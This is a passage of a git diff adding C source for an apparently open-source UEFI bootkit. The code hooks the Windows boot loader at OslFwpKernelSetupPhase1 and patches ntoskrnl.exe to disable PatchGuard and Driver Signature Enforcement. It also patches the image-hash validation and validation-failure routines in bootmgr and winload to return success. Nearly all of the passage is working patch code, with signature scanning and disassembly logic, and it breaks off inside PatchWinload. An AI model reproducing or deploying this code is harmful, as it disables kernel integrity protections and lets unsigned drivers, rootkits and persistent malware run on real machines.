+ // SepInitializeCodeIntegrity is only patched when using the 'nuke option' DSE_DISABLE_AT_BOOT.
+ if (BypassType == DSE_DISABLE_AT_BOOT)
+ *((UINT16*)SepInitializeCodeIntegrityMovEcxAddress) = 0xC931; // xor ecx, ecx
+
+ // SeValidateImageData *must* be patched on Windows Vista and 7 regardless of the DSE bypass method.
+ // On Windows >= 8, again require DSE_DISABLE_AT_BOOT to do anything as it is otherwise harmless.
+ if (BuildNumber < 9200)
+ *SeValidateImageDataJzAddress = 0xEB; // jmp
+ else if (BypassType == DSE_DISABLE_AT_BOOT)
+ *(UINT32*)((UINT8*)SeValidateImageDataMovEaxAddress + 1 /*skip existing mov opcode*/) = 0x0; // mov eax, 0
+
+ if (BuildNumber >= 16299 && BypassType == DSE_DISABLE_AT_BOOT)
+ {
+ // We are on RS3 or higher. If we can find and patch SeCodeIntegrityQueryInformation, great.
+ // But DSE has been disabled at this point, so success will be returned regardless.
+ UINT8* Found = NULL;
+ CONST EFI_STATUS CiStatus = FindPattern(SigSeCodeIntegrityQueryInformation,
+ 0xCC,
+ sizeof(SigSeCodeIntegrityQueryInformation),
+ (VOID*)PageStartVa, // SeCodeIntegrityQueryInformation is in PAGE, so start there
+ PageSizeOfRawData,
+ (VOID**)&Found);
+ if (EFI_ERROR(CiStatus))
+ {
+ PRINT_KERNEL_PATCH_MSG(L"\r\nFailed to find SeCodeIntegrityQueryInformation. Skipping patch.\r\n");
+ }
+ else
+ {
+ CopyMem((VOID*)Found, (VOID*)SeCodeIntegrityQueryInformationPatch, sizeof(SeCodeIntegrityQueryInformationPatch));
+ PRINT_KERNEL_PATCH_MSG(L"\r\nPatched SeCodeIntegrityQueryInformation [RVA: 0x%X].\r\n", (UINT32)(Found - ImageBase));
+ }
+ }
+
+ return EFI_SUCCESS;
+}
+
+//
+// Patches ntoskrnl.exe
+//
+EFI_STATUS
+EFIAPI
+PatchNtoskrnl(
+ IN VOID* ImageBase,
+ IN PEFI_IMAGE_NT_HEADERS NtHeaders
+ )
+{
+ PRINT_KERNEL_PATCH_MSG(L"[PatchNtoskrnl] ntoskrnl.exe at 0x%llX, size 0x%llX\r\n", (UINTN)ImageBase, (UINTN)NtHeaders->OptionalHeader.SizeOfImage);
+
+ // Print file and version info
+ UINT16 MajorVersion = 0, MinorVersion = 0, BuildNumber = 0, Revision = 0;
+ UINT32 FileFlags = 0;
+ EFI_STATUS Status = GetPeFileVersionInfo((VOID*)ImageBase, &MajorVersion, &MinorVersion, &BuildNumber, &Revision, &FileFlags);
+ if (EFI_ERROR(Status))
+ {
+ PRINT_KERNEL_PATCH_MSG(L"[PatchNtoskrnl] WARNING: failed to obtain ntoskrnl.exe version info. Status: %llx\r\n", Status);
+ }
+ else
+ {
+ PRINT_KERNEL_PATCH_MSG(L"[PatchNtoskrnl] Patching ntoskrnl.exe v%u.%u.%u.%u...\r\n", MajorVersion, MinorVersion, BuildNumber, Revision);
+
+ // Check if this is a supported kernel version. All versions after Vista SP1 should be supported.
+ // There is no "maximum allowed" version; e.g. 10.1, 11.0... are OK. Windows 10 is a whole three major versions higher than Windows 7,
+ // and the only real changes were an added spyware bundle and the removal of the classic theme. Seriously, fuck whoever did that
+ if (BuildNumber < 6001)
+ {
+ PRINT_KERNEL_PATCH_MSG(L"[PatchNtoskrnl] ERROR: Unsupported kernel image version.\r\n");
+ return EFI_UNSUPPORTED;
+ }
+
+ if ((FileFlags & VS_FF_DEBUG) != 0)
+ {
+ // Do not patch checked kernels. There is too much difference in PG and DSE initialization code due to missing optimizations.
+ // This is a moot point anyway because MS has stopped releasing checked OS builds or even kernels to common plebs (i.e. not Intel or Nvidia)
+ PRINT_KERNEL_PATCH_MSG(L"[PatchNtoskrnl] ERROR: Checked kernels are not supported.\r\n");
+ return EFI_UNSUPPORTED;
+ }
+ }
+
+ // Find the INIT and PAGE sections
+ PEFI_IMAGE_SECTION_HEADER InitSection = NULL, PageSection = NULL;
+ PEFI_IMAGE_SECTION_HEADER Section = IMAGE_FIRST_SECTION(NtHeaders);
+ for (UINT16 i = 0; i < NtHeaders->FileHeader.NumberOfSections; ++i)
+ {
+ CHAR8 SectionName[EFI_IMAGE_SIZEOF_SHORT_NAME + 1];
+ CopyMem(SectionName, Section->Name, EFI_IMAGE_SIZEOF_SHORT_NAME);
+ SectionName[MAX(sizeof("PAGE"), sizeof("INIT"))] = '\0'; // Null terminate so we don't match lookalikes like INITDATA and PAGEVRFY
+
+ if (AsciiStrCmp(SectionName, "INIT") == 0)
+ InitSection = Section;
+ else if (AsciiStrCmp(SectionName, "PAGE") == 0)
+ PageSection = Section;
+
+ Section++;
+ }
+
+ ASSERT(InitSection != NULL);
+ ASSERT(PageSection != NULL);
+
+ // Patch INIT section to disable PatchGuard
+ PRINT_KERNEL_PATCH_MSG(L"[PatchNtoskrnl] Disabling PatchGuard... [INIT RVA: 0x%X - 0x%X]\r\n",
+ InitSection->VirtualAddress, InitSection->VirtualAddress + InitSection->SizeOfRawData);
+ Status = DisablePatchGuard((UINT8*)ImageBase,
+ NtHeaders,
+ InitSection,
+ BuildNumber);
+ if (EFI_ERROR(Status))
+ goto Exit;
+
+ PRINT_KERNEL_PATCH_MSG(L"\r\n[PatchNtoskrnl] Successfully disabled PatchGuard.\r\n");
+
+ if (gDriverConfig.DseBypassMethod == DSE_DISABLE_AT_BOOT ||
+ (BuildNumber < 9200 && gDriverConfig.DseBypassMethod != DSE_DISABLE_NONE))
+ {
+ // Patch PAGE section to disable DSE at boot, or (on Windows Vista/7) to allow the SetVariable hook to be safely used more than once
+ PRINT_KERNEL_PATCH_MSG(L"[PatchNtoskrnl] %S... [PAGE RVA: 0x%X - 0x%X]\r\n",
+ gDriverConfig.DseBypassMethod == DSE_DISABLE_AT_BOOT ? L"Disabling DSE" : L"Ensuring safe DSE bypass",
+ PageSection->VirtualAddress, PageSection->VirtualAddress + PageSection->SizeOfRawData);
+ Status = DisableDSE((UINT8*)ImageBase,
+ NtHeaders,
+ PageSection,
+ gDriverConfig.DseBypassMethod,
+ BuildNumber);
+ if (EFI_ERROR(Status))
+ goto Exit;
+
+ if (gDriverConfig.DseBypassMethod == DSE_DISABLE_AT_BOOT)
+ PRINT_KERNEL_PATCH_MSG(L"\r\n[PatchNtoskrnl] Successfully disabled DSE.\r\n");
+ }
+
+Exit:
+ return Status;
+}
diff --git a/EfiGuardDxe/PatchWinload.c b/EfiGuardDxe/PatchWinload.c
new file mode 100644
index 0000000..1a37de4
--- /dev/null
+++ b/EfiGuardDxe/PatchWinload.c
@@ -0,0 +1,683 @@
+#include "EfiGuardDxe.h"
+
+#include <Guid/Acpi.h>
+#include <Library/BaseMemoryLib.h>
+
+t_OslFwpKernelSetupPhase1 gOriginalOslFwpKernelSetupPhase1 = NULL;
+UINT8 gOslFwpKernelSetupPhase1Backup[sizeof(gHookTemplate)] = { 0 };
+
+
+// Signature for winload!OslFwpKernelSetupPhase1+XX, where the value of XX needs to be determined by backtracking.
+// Windows 10 only. On older OSes, and on Windows 10 as fallback, OslFwpKernelSetupPhase1 is found via xrefs to EfipGetRsdt
+STATIC CONST UINT8 SigOslFwpKernelSetupPhase1[] = {
+ 0xE8, 0xCC, 0xCC, 0xCC, 0xCC, // call BlpArchSwitchContext
+ 0x48, 0x8B, 0x05, 0xCC, 0xCC, 0xCC, 0xCC, // mov rax, gBS
+ 0xCC, 0x8B, 0xCC, // mov rdx, XX
+ 0x48, 0x8B, 0x0D, 0xCC, 0xCC, 0xCC, 0xCC // mov rcx, EfiImageHandle
+};
+
+STATIC UNICODE_STRING ImgpFilterValidationFailureMessage = RTL_CONSTANT_STRING(L"*** Windows is unable to verify the signature of"); // newline, etc etc...
+
+// Signature for winload!BlStatusPrint. This is only needed if winload.efi does not export it (RS4 and earlier)
+// Windows 10 only. I could find a universal signature for this, but I rarely need the debugger output anymore...
+STATIC CONST UINT8 SigBlStatusPrint[] = {
+ 0x48, 0x8B, 0xC4, // mov rax, rsp
+ 0x48, 0x89, 0x48, 0x08, // mov [rax+8], rcx
+ 0x48, 0x89, 0x50, 0x10, // mov [rax+10h], rdx
+ 0x4C, 0x89, 0x40, 0x18, // mov [rax+18h], r8
+ 0x4C, 0x89, 0x48, 0x20, // mov [rax+20h], r9
+ 0x53, // push rbx
+ 0x48, 0x83, 0xEC, 0x40, // sub rsp, 40h
+ 0xE8, 0xCC, 0xCC, 0xCC, 0xCC, // call BlBdDebuggerEnabled
+ 0x84, 0xC0, // test al, al
+ 0x74, 0xCC // jz XX
+};
+
+
+NTSTATUS
+EFIAPI
+BlStatusPrintNoop(
+ IN CONST CHAR16 *Format,
+ ...
+ )
+{
+ return 0xC00000BBL; // STATUS_NOT_SUPPORTED
+}
+
+t_BlStatusPrint gBlStatusPrint = BlStatusPrintNoop;
+
+//
+// Gets a loaded module entry from the boot loader's LoadOrderList
+//
+STATIC
+PKLDR_DATA_TABLE_ENTRY
+EFIAPI
+GetBootLoadedModule(
+ IN LIST_ENTRY* LoadOrderListHead,
+ IN CHAR16* ModuleName
+ )
+{
+ if (ModuleName == NULL || LoadOrderListHead == NULL)
+ return NULL;
+
+ for (LIST_ENTRY* ListEntry = LoadOrderListHead->ForwardLink; ListEntry != LoadOrderListHead; ListEntry = ListEntry->ForwardLink)
+ {
+ // This is fairly heavy abuse of CR(), but legal C because (only) the first field of a struct is guaranteed to be at offset 0 (C99 6.7.2.1, point 13)
+ CONST PBLDR_DATA_TABLE_ENTRY Entry = (PBLDR_DATA_TABLE_ENTRY)BASE_CR(ListEntry, KLDR_DATA_TABLE_ENTRY, InLoadOrderLinks);
+ if (Entry != NULL && StrnCmp(Entry->KldrEntry.BaseDllName.Buffer, ModuleName, (Entry->KldrEntry.BaseDllName.Length / sizeof(CHAR16))) == 0)
+ return &Entry->KldrEntry;
+ }
+ return NULL;
+}
+
+//
+// winload.efi!OslFwpKernelSetupPhase1 hook to patch ntoskrnl.exe
+//
+EFI_STATUS
+EFIAPI
+HookedOslFwpKernelSetupPhase1(
+ IN PLOADER_PARAMETER_BLOCK LoaderBlock
+ )
+{
+ // Restore the original function bytes that we replaced with our hook
+ CopyMem((VOID*)gOriginalOslFwpKernelSetupPhase1, gOslFwpKernelSetupPhase1Backup, sizeof(gOslFwpKernelSetupPhase1Backup));
+
+ UINT8* LoadOrderListHeadAddress = (UINT8*)&LoaderBlock->LoadOrderListHead;
+ if (gKernelPatchInfo.LegacyLoaderBlock)
+ {
+ // We are booting Vista or some other fossil, which means that our LOADER_PARAMETER_BLOCK declaration in no way matches what is
+ // actually being passed by the loader. Notably, the first four UINT32 fields are absent, so fix up the list entry pointer.
+ LoadOrderListHeadAddress -= FIELD_OFFSET(LOADER_PARAMETER_BLOCK, LoadOrderListHead);
+ }
+
+ // Get the kernel entry from the loader block's LoadOrderList
+ CONST PKLDR_DATA_TABLE_ENTRY KernelEntry = GetBootLoadedModule((LIST_ENTRY*)LoadOrderListHeadAddress, L"ntoskrnl.exe");
+ if (KernelEntry == NULL)
+ {
+ gKernelPatchInfo.Status = EFI_LOAD_ERROR;
+ PRINT_KERNEL_PATCH_MSG(L"[HookedOslFwpKernelSetupPhase1] Failed to find ntoskrnl.exe in LoadOrderList!\r\n");
+ goto CallOriginal;
+ }
+
+ VOID* KernelBase = KernelEntry->DllBase;
+ CONST UINT32 KernelSize = KernelEntry->SizeOfImage;
+ CONST PEFI_IMAGE_NT_HEADERS NtHeaders = KernelBase != NULL && KernelSize > 0
+ ? RtlpImageNtHeaderEx(KernelBase, (UINTN)KernelSize)
+ : NULL;
+ if (KernelBase == NULL || KernelSize == 0)
+ {
+ gKernelPatchInfo.Status = EFI_NOT_FOUND;
+ PRINT_KERNEL_PATCH_MSG(L"[HookedOslFwpKernelSetupPhase1] Kernel image at 0x%p with size 0x%lx is invalid!\r\n", KernelBase, KernelSize);
+ goto CallOriginal;
+ }
+
+ // Patch the kernel
+ gKernelPatchInfo.KernelBase = KernelBase;
+ gKernelPatchInfo.Status = PatchNtoskrnl(KernelBase,
+ NtHeaders);
+
+CallOriginal:
+ // No error handling here (not a lot of options). This is done in the ExitBootServices() callback which reads the patch status
+
+ // Call the original function to transfer execution back to winload!OslFwpKernelSetupPhase1
+ return gOriginalOslFwpKernelSetupPhase1(LoaderBlock);
+}
+
+//
+// Patches ImgpValidateImageHash in bootmgfw.efi, bootmgr.efi, and winload.[efi|exe] to allow loading modified kernels and boot loaders.
+// Failures are ignored because this patch is not needed for the bootkit to work
+//
+EFI_STATUS
+EFIAPI
+PatchImgpValidateImageHash(
+ IN INPUT_FILETYPE FileType,
+ IN UINT8* ImageBase,
+ IN PEFI_IMAGE_NT_HEADERS NtHeaders
+ )
+{
+ // This works on pretty much anything really
+ ASSERT(FileType == WinloadExe || FileType == BootmgfwEfi || FileType == BootmgrEfi || FileType == WinloadEfi);
+ CONST CHAR16* ShortName = FileType == BootmgfwEfi ? L"bootmgfw" : (FileType == BootmgrEfi ? L"bootmgr" : L"winload");
+
+ CONST PEFI_IMAGE_SECTION_HEADER CodeSection = IMAGE_FIRST_SECTION(NtHeaders);
+
+ CONST UINT32 CodeSizeOfRawData = CodeSection->SizeOfRawData;
+ CONST UINT8* CodeStartVa = ImageBase + CodeSection->VirtualAddress;
+
+ Print(L"== Disassembling .text to find %S!ImgpValidateImageHash ==\r\n", ShortName);
+ UINT8* AndMinusFortyOneAddress = NULL;
+
+ // Initialize Zydis
+ ZydisDecoder Decoder;
+ ZyanStatus Status = ZydisInit(NtHeaders, &Decoder, NULL);
+ if (!ZYAN_SUCCESS(Status))
+ {
+ Print(L"Failed to initialize disassembler engine.\r\n");
+ return EFI_LOAD_ERROR;
+ }
+
+ CONST UINTN Length = CodeSizeOfRawData;
+ UINTN Offset = 0;
+ ZyanU64 InstructionAddress;
+ ZydisDecodedInstruction Instruction;
+
+ // Start decode loop
+ while ((InstructionAddress = (ZyanU64)(CodeStartVa + Offset),
+ Status = ZydisDecoderDecodeBuffer(&Decoder,
+ (VOID*)InstructionAddress,
+ Length - Offset,
+ &Instruction)) != ZYDIS_STATUS_NO_MORE_DATA)
+ {
+ if (!ZYAN_SUCCESS(Status))
+ {
+ Offset++;
+ continue;
+ }
+
+ // Check if this is 'and REG32, 0FFFFFFD7h' (only esi and r8d are used here really)
+ if (Instruction.operand_count == 3 &&
+ (Instruction.length == 3 || Instruction.length == 4) &&
+ Instruction.mnemonic == ZYDIS_MNEMONIC_AND &&
+ Instruction.operands[0].type == ZYDIS_OPERAND_TYPE_REGISTER &&
+ Instruction.operands[1].type == ZYDIS_OPERAND_TYPE_IMMEDIATE &&
+ Instruction.operands[1].imm.is_signed == ZYAN_TRUE &&
+ Instruction.operands[1].imm.value.s == (ZyanI64)((ZyanI32)0xFFFFFFD7)) // Sign extend to 64 bits
+ {
+ AndMinusFortyOneAddress = (UINT8*)InstructionAddress;
+ break;
+ }
+
+ Offset += Instruction.length;
+ }
+
+ // Backtrack to function start
+ CONST UINT8* ImgpValidateImageHash = BacktrackToFunctionStart(AndMinusFortyOneAddress, CodeStartVa);
+ if (ImgpValidateImageHash == NULL)
+ {
+ Print(L" Failed to find %S!ImgpValidateImageHash%S.\r\n",
+ ShortName, (AndMinusFortyOneAddress == NULL ? L" 'and xxx, 0FFFFFFD7h' instruction" : L""));
+ return EFI_NOT_FOUND;
+ }
+
+ // Apply the patch
+ *((UINT32*)ImgpValidateImageHash) = 0xC3C033; // xor eax, eax, ret
+
+ // Print info
+ Print(L" Patched %S!ImgpValidateImageHash [RVA: 0x%X].\r\n",
+ ShortName, (UINT32)(ImgpValidateImageHash - ImageBase));
+
+ return EFI_SUCCESS;
+}
+
+//
+// Patches ImgpFilterValidationFailure in bootmgfw.efi, bootmgr.efi, and winload.[efi|exe]
+// Failures are ignored because this patch is not needed for the bootkit to work
+//
+EFI_STATUS
+EFIAPI
+PatchImgpFilterValidationFailure(
+ IN INPUT_FILETYPE FileType,
+ IN UINT8* ImageBase,
+ IN PEFI_IMAGE_NT_HEADERS NtHeaders
+ )
+{
+ // This works on pretty much anything really
+ ASSERT(FileType == WinloadExe || FileType == BootmgfwEfi || FileType == BootmgrEfi || FileType == WinloadEfi);
+ CONST CHAR16* ShortName = FileType == BootmgfwEfi ? L"bootmgfw" : (FileType == BootmgrEfi ? L"bootmgr" : L"winload");
+
+ // Find .text and/or .rdata sections
+ PEFI_IMAGE_SECTION_HEADER PatternSection = NULL, CodeSection = NULL;
+ PEFI_IMAGE_SECTION_HEADER Section = IMAGE_FIRST_SECTION(NtHeaders);
+ for (UINT16 i = 0; i < NtHeaders->FileHeader.NumberOfSections; ++i)
+ {
+ if (CompareMem(Section->Name, ".text", sizeof(".text") - 1) == 0)
+ CodeSection = Section;
+ if ((FileType == BootmgfwEfi || FileType == BootmgrEfi) &&
+ CompareMem(Section->Name, ".text", sizeof(".text") - 1) == 0) // [bootmgfw|bootmgr].efi (usually) has no .rdata section, and starting at .text is always fine
+ PatternSection = Section;
+ else if ((FileType == WinloadExe || FileType == WinloadEfi) &&
+ CompareMem(Section->Name, ".rdata", sizeof(".rdata") - 1) == 0) // For winload.[exe|efi] the string is in .rdata
+ PatternSection = Section;
+ Section++;
+ }
+
+ ASSERT(PatternSection != NULL);
+ ASSERT(CodeSection != NULL);
+
+ CONST UINT32 PatternStartRva = PatternSection->VirtualAddress;
+ CONST UINT32 PatternSizeOfRawData = PatternSection->SizeOfRawData;
+ CONST UINT8* PatternStartVa = ImageBase + PatternStartRva;
+
+ CHAR8 SectionName[EFI_IMAGE_SIZEOF_SHORT_NAME + 1];
+ CopyMem((VOID*)SectionName, (VOID*)PatternSection->Name, EFI_IMAGE_SIZEOF_SHORT_NAME);
+ SectionName[EFI_IMAGE_SIZEOF_SHORT_NAME] = '\0';
+ Print(L"\r\n== Searching for load failure string in %a [RVA: 0x%X - 0x%X] ==\r\n",
+ SectionName, PatternStartRva, PatternStartRva + PatternSizeOfRawData);
+
+ // Search for the black screen of death string "Windows is unable to verify the integrity of the file [...]"
+ UINT8* IntegrityFailureStringAddress = NULL;
+ for (UINT8* Address = (UINT8*)PatternStartVa;
+ Address < ImageBase + NtHeaders->OptionalHeader.SizeOfImage - ImgpFilterValidationFailureMessage.MaximumLength;
+ ++Address)
+ {
+ if (CompareMem(Address, ImgpFilterValidationFailureMessage.Buffer, ImgpFilterValidationFailureMessage.Length) == 0)
+ {
+ IntegrityFailureStringAddress = Address;
+ Print(L" Found load failure string at 0x%llx.\r\n", (UINTN)IntegrityFailureStringAddress);
+ break;
+ }
+ }
+
+ if (IntegrityFailureStringAddress == NULL)
+ {
+ Print(L" Failed to find load failure string.\r\n");
+ return EFI_NOT_FOUND;
+ }
+
+ CONST UINT32 CodeStartRva = CodeSection->VirtualAddress;
+ CONST UINT32 CodeSizeOfRawData = CodeSection->SizeOfRawData;
+ CONST UINT8* CodeStartVa = ImageBase + CodeStartRva;
+
+ ZeroMem((VOID*)SectionName, sizeof(SectionName));
+ CopyMem((VOID*)SectionName, (VOID*)CodeSection->Name, EFI_IMAGE_SIZEOF_SHORT_NAME);
+ Print(L"== Disassembling %a to find %S!ImgpFilterValidationFailure ==\r\n", SectionName, ShortName);
+ UINT8* LeaIntegrityFailureAddress = NULL;
+
+ // Initialize Zydis
+ ZydisDecoder Decoder;
+ ZyanStatus Status = ZydisInit(NtHeaders, &Decoder, NULL);
+ if (!ZYAN_SUCCESS(Status))
+ {
+ Print(L"Failed to initialize disassembler engine.\r\n");
+ return EFI_LOAD_ERROR;
+ }
+
+ CONST UINTN Length = CodeSizeOfRawData;
+ UINTN Offset = 0;
+ ZyanU64 InstructionAddress;
+ ZydisDecodedInstruction Instruction;
+
+ // Start decode loop
+ while ((InstructionAddress = (ZyanU64)(CodeStartVa + Offset),
+ Status = ZydisDecoderDecodeBuffer(&Decoder,
+ (VOID*)InstructionAddress,
+ Length - Offset,
+ &Instruction)) != ZYDIS_STATUS_NO_MORE_DATA)
+ {
+ if (!ZYAN_SUCCESS(Status))
+ {
+ Offset++;
+ continue;
+ }
+
+ // Check if this is "lea REG, ds:[rip + offset_to_bsod_string]"
+ if (Instruction.operand_count == 2 && Instruction.mnemonic == ZYDIS_MNEMONIC_LEA &&
+ Instruction.operands[1].type == ZYDIS_OPERAND_TYPE_MEMORY &&
+ Instruction.operands[1].mem.base == ZYDIS_REGISTER_RIP)
+ {
+ ZyanU64 OperandAddress = 0;
+ if (ZYAN_SUCCESS(ZydisCalcAbsoluteAddress(&Instruction, &Instruction.operands[1], InstructionAddress, &OperandAddress)) &&
+ OperandAddress == (UINTN)IntegrityFailureStringAddress)
+ {
+ LeaIntegrityFailureAddress = (UINT8*)InstructionAddress;
+ Print(L" Found load instruction for load failure string at 0x%llx.\r\n", (UINTN)LeaIntegrityFailureAddress);
+ break;
+ }
+ }
+
+ Offset += Instruction.length;
+ }
+
+ // Backtrack to function start
+ CONST UINT8* ImgpFilterValidationFailure = BacktrackToFunctionStart(LeaIntegrityFailureAddress, LeaIntegrityFailureAddress - Length);
+ if (ImgpFilterValidationFailure == NULL)
+ {
+ Print(L" Failed to find %S!ImgpFilterValidationFailure%S.\r\n",
+ ShortName, (LeaIntegrityFailureAddress == NULL ? L" load failure string load instruction" : L""));
+ return EFI_NOT_FOUND;
+ }
+
+ // Apply the patch
+ *((UINT32*)ImgpFilterValidationFailure) = 0xC3C033; // xor eax, eax, ret
+
+ // Print info
+ Print(L" Patched %S!ImgpFilterValidationFailure [RVA: 0x%X].\r\n\r\n",
+ ShortName, (UINT32)(ImgpFilterValidationFailure - ImageBase));
+
+ return EFI_SUCCESS;
+}
+
+//
+// Finds OslFwpKernelSetupPhase1 in winload.efi
+//
+EFI_STATUS
+EFIAPI
+FindOslFwpKernelSetupPhase1(
+ IN CONST UINT8* ImageBase,
+ IN PEFI_IMAGE_NT_HEADERS NtHeaders,
+ IN PEFI_IMAGE_SECTION_HEADER CodeSection,
+ IN PEFI_IMAGE_SECTION_HEADER PatternSection,
+ IN BOOLEAN TryPatternMatch,
+ OUT UINT8** OslFwpKernelSetupPhase1Address
+ )
+{
+ *OslFwpKernelSetupPhase1Address = NULL;
+
+ CONST UINT8* CodeStartVa = ImageBase + CodeSection->VirtualAddress;
+ CONST UINT32 CodeSizeOfRawData = CodeSection->SizeOfRawData;
+ CONST UINT8* PatternStartVa = ImageBase + PatternSection->VirtualAddress;
+
+ if (TryPatternMatch)
+ {
+ // On Windows 10, try simple pattern matching first since it will most likely work
+ UINT8* Found = NULL;
+ CONST EFI_STATUS Status = FindPattern(SigOslFwpKernelSetupPhase1,
+ 0xCC,
+ sizeof(SigOslFwpKernelSetupPhase1),
+ (VOID*)CodeStartVa,
+ CodeSizeOfRawData,
+ (VOID**)&Found);
+ if (!EFI_ERROR(Status))
+ {
+ // Found signature; backtrack to function start
+ *OslFwpKernelSetupPhase1Address = BacktrackToFunctionStart(Found, Found - 0x400);
+ if (*OslFwpKernelSetupPhase1Address != NULL)
+ {
+ Print(L"\r\nFound OslFwpKernelSetupPhase1 at 0x%llX.\r\n", (UINTN)(*OslFwpKernelSetupPhase1Address));
+ return EFI_SUCCESS; // Found; early out
+ }
+ }
+ }
+
+ // On older versions, use some convoluted but robust logic to find OslFwpKernelSetupPhase1 by matching xrefs to EfipGetRsdt.
+ // This of course implies finding EfipGetRsdt first. After that, find all calls to this function, and for each, calculate
+ // the distance from the start of the function to the call. OslFwpKernelSetupPhase1 is reliably (Vista through 10)
+ // the function that has the smallest value for this distance, i.e. the call happens very early in the function.
+ CHAR8 SectionName[EFI_IMAGE_SIZEOF_SHORT_NAME + 1];
+ CopyMem(SectionName, PatternSection->Name, EFI_IMAGE_SIZEOF_SHORT_NAME);
+ SectionName[EFI_IMAGE_SIZEOF_SHORT_NAME] = '\0';
+ Print(L"\r\n== Searching for EfipGetRsdt pattern in %a ==\r\n", SectionName);
+
+ // Search for EFI ACPI 2.0 table GUID: { 8868e871-e4f1-11d3-bc22-0080c73c8881 }
+ UINT8* PatternAddress = NULL;
+ for (UINT8* Address = (UINT8*)PatternStartVa;
+ Address < ImageBase + NtHeaders->OptionalHeader.SizeOfImage - sizeof(gEfiAcpi20TableGuid);
+ ++Address)
+ {
+ if (CompareGuid((CONST GUID*)Address, &gEfiAcpi20TableGuid))
+ {
+ PatternAddress = Address;
+ Print(L" Found EFI ACPI 2.0 GUID at 0x%llX.\r\n", (UINTN)PatternAddress);
+ break;
+ }
+ }
+
+ if (PatternAddress == NULL)
+ {
+ Print(L" Failed to find EFI ACPI 2.0 GUID.\r\n");
+ return EFI_NOT_FOUND;
+ }
+
+ Print(L"\r\n== Disassembling .text to find EfipGetRsdt ==\r\n");
+ UINT8* LeaEfiAcpiTableGuidAddress = NULL;
+
+ // Initialize Zydis
+ ZydisDecoder Decoder;
+ ZyanStatus Status = ZydisInit(NtHeaders, &Decoder, NULL);
+ if (!ZYAN_SUCCESS(Status))
+ {
+ Print(L"Failed to initialize disassembler engine.\r\n");
+ return EFI_LOAD_ERROR;
+ }
+
+ CONST UINTN Length = CodeSizeOfRawData;
+ UINTN Offset = 0;
+ ZyanU64 InstructionAddress;
+ ZydisDecodedInstruction Instruction;
+
+ // Start decode loop
+ while ((InstructionAddress = (ZyanU64)(CodeStartVa + Offset),
+ Status = ZydisDecoderDecodeBuffer(&Decoder,
+ (VOID*)InstructionAddress,
+ Length - Offset,
+ &Instruction)) != ZYDIS_STATUS_NO_MORE_DATA)
+ {
+ if (!ZYAN_SUCCESS(Status))
+ {
+ Offset++;
+ continue;
+ }
+
+ // Check if this is "lea rcx, ds:[rip + offset_to_acpi20_guid]"
+ if (Instruction.operand_count == 2 && Instruction.mnemonic == ZYDIS_MNEMONIC_LEA &&
+ Instruction.operands[0].type == ZYDIS_OPERAND_TYPE_REGISTER &&
+ Instruction.operands[0].reg.value == ZYDIS_REGISTER_RCX &&
+ Instruction.operands[1].type == ZYDIS_OPERAND_TYPE_MEMORY &&
+ Instruction.operands[1].mem.base == ZYDIS_REGISTER_RIP)
+ {
+ ZyanU64 OperandAddress = 0;
+ if (ZYAN_SUCCESS(ZydisCalcAbsoluteAddress(&Instruction, &Instruction.operands[1], InstructionAddress, &OperandAddress)) &&
+ OperandAddress == (UINTN)PatternAddress)
+ {
+ // Check for false positives (BlFwGetSystemTable)
+ CONST UINT8* Check = (UINT8*)(CodeStartVa + Offset - 4); // 4 = length of 'lea rdx, [r11+18h]' which precedes this instruction in EfipGetRsdt
+ if (Check[0] == 0x49 && Check[1] == 0x8D && Check[2] == 0x53) // If no match, this is not EfipGetRsdt
+ {
+ LeaEfiAcpiTableGuidAddress = (UINT8*)InstructionAddress;
+ Print(L" Found load instruction for EFI ACPI 2.0 GUID at 0x%llX.\r\n", (UINTN)LeaEfiAcpiTableGuidAddress);
+ break;
+ }
+ }
+ }
+
+ Offset += Instruction.length;
+ }
+
+ if (LeaEfiAcpiTableGuidAddress == NULL)
+ {
+ Print(L" Failed to find load instruction for EFI ACPI 2.0 GUID.\r\n");
+ return EFI_NOT_FOUND;
+ }
+
+ CONST UINT8* EfipGetRsdt = BacktrackToFunctionStart(LeaEfiAcpiTableGuidAddress, LeaEfiAcpiTableGuidAddress - Length);
+ if (EfipGetRsdt == NULL)
+ {
+ Print(L" Failed to find EfipGetRsdt.\r\n");
+ return EFI_NOT_FOUND;
+ }
+
+ Print(L" Found EfipGetRsdt at 0x%llX.\r\n", (UINTN)EfipGetRsdt);
+ Print(L"\r\n== Disassembling .text to find OslFwpKernelSetupPhase1 ==\r\n");
+ UINT8* CallEfipGetRsdtAddress = NULL;
+
+ // Start decode loop
+ Offset = 0;
+ UINTN ShortestDistanceToCall = MAX_UINTN;
+ while ((InstructionAddress = (ZyanU64)(CodeStartVa + Offset),
+ Status = ZydisDecoderDecodeBuffer(&Decoder,
+ (VOID*)InstructionAddress,
+ Length - Offset,
+ &Instruction)) != ZYDIS_STATUS_NO_MORE_DATA)
+ {
+ if (!ZYAN_SUCCESS(Status))
+ {
+ Offset++;
+ continue;
+ }
+
+ // Check if this is 'call IMM'
+ if (Instruction.operand_count == 4 &&
+ Instruction.operands[0].type == ZYDIS_OPERAND_TYPE_IMMEDIATE && Instruction.operands[0].imm.is_relative == ZYAN_TRUE &&
+ Instruction.mnemonic == ZYDIS_MNEMONIC_CALL)
+ {
+ // Check if this is 'call EfipGetRsdt'
+ ZyanU64 OperandAddress = 0;
+ if (ZYAN_SUCCESS(ZydisCalcAbsoluteAddress(&Instruction, &Instruction.operands[0], InstructionAddress, &OperandAddress)) &&
+ OperandAddress == (UINTN)EfipGetRsdt)
+ {
+ // Calculate the distance from the start of the function to the instruction. OslFwpKernelSetupPhase1 will always have the shortest distance
+ CONST UINTN StartOfFunction = (UINTN)BacktrackToFunctionStart((UINT8*)InstructionAddress, (UINT8*)InstructionAddress - Length);
+ CONST UINTN Distance = InstructionAddress - StartOfFunction;
+ if (Distance < ShortestDistanceToCall)
+ {
+ CallEfipGetRsdtAddress = (UINT8*)InstructionAddress;
+ ShortestDistanceToCall = Distance;
+ }
+ }
+ }
+
+ Offset += Instruction.length;
+ }
+
+ if (CallEfipGetRsdtAddress == NULL)
+ {
+ Print(L" Failed to find a single 'call EfipGetRsdt' instruction.\r\n");
+ return EFI_NOT_FOUND;
+ }
+
+ // Found
+ *OslFwpKernelSetupPhase1Address = CallEfipGetRsdtAddress - ShortestDistanceToCall;
+ Print(L" Found OslFwpKernelSetupPhase1 at 0x%llX.\r\n\r\n", (UINTN)(*OslFwpKernelSetupPhase1Address));
+
+ return EFI_SUCCESS;
+}
+
+//
+// Patches winload.efi
+//
+EFI_STATUS
+EFIAPI
+PatchWinload(
+ IN VOID* ImageBase,
